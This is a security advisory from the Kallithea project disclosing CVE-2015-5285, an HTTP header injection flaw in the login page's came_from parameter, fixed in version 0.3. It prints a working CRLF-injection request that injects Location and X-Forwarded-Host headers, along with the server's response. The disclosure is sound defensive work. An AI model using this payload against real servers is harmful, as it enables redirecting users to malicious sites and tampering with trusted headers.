Kallithea Security Notice CVE-2015-5285

HTTP header injection


A vulnerability has been found in Kallithea, allowing attackers to inject arbitrary headers into the server response for certain URLs.


HTTP header injection was possible in login-related code of Kallithea, allowing attackers to inject arbitrary headers into the server responses.

The vulnerability affects the came_from GET parameter.

Example of a malicious request:

GET /_admin/login?came_from=1%0d%0aX-Forwarded-Host%3a%20http://zeroscience.mk%01%02%0d%0aLocation%3a%20http://zeroscience.mk HTTP/1.1
Content-Length: 0
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.93 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.8
Cookie: kallithea=3090b35b3e37ba350d71b62c240c50bf87932f0d7e6b1a600cba4e0e890b7e29e253b438

Corresponding response:

HTTP/1.1 302 Found
Cache-Control: no-cache
Content-Length: 411
Content-Type: text/html; charset=UTF-8
Date: Mon, 21 Sep 2015 13:58:05 GMT
X-Forwarded-Host: http://zeroscience.mk
Location: http://zeroscience.mk
Pragma: no-cache
Server: waitress

  <title>302 Found</title>
  <h1>302 Found</h1>
  The resource was found at <a href="
X-Forwarded-Host: http://zeroscience.mk
Location: http://zeroscience.mk ">
X-Forwarded-Host: http://zeroscience.mk
Location: http://zeroscience.mk </a>;
you should be redirected automatically.



The bug allows an attacker to override important response headers, possibly redirecting users to a malicious website or make other middleware misbehave when it trusts the response headers.


The Kallithea project has fixed this issue in the stable branch. Users are recommended to upgrade to the latest 0.3 release.

Affected versions

The issue is present in Kallithea versions before 0.3.


Thanks to Gjoko Krstic of Zero Science Lab for reporting this issue.


  1. CVE-2015-5285 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5285

  2. Kallithea: Security Notice CVE-2015-5285 https://kallithea-scm.org/security/cve-2015-5285.html

  3. Mercurial changeset fixing the issue https://kallithea-scm.org/repos/kallithea/changeset/38d1c99cd0005c1df5a37692615356c918dbe068

  4. Zero Science Lab http://www.zeroscience.mk/en/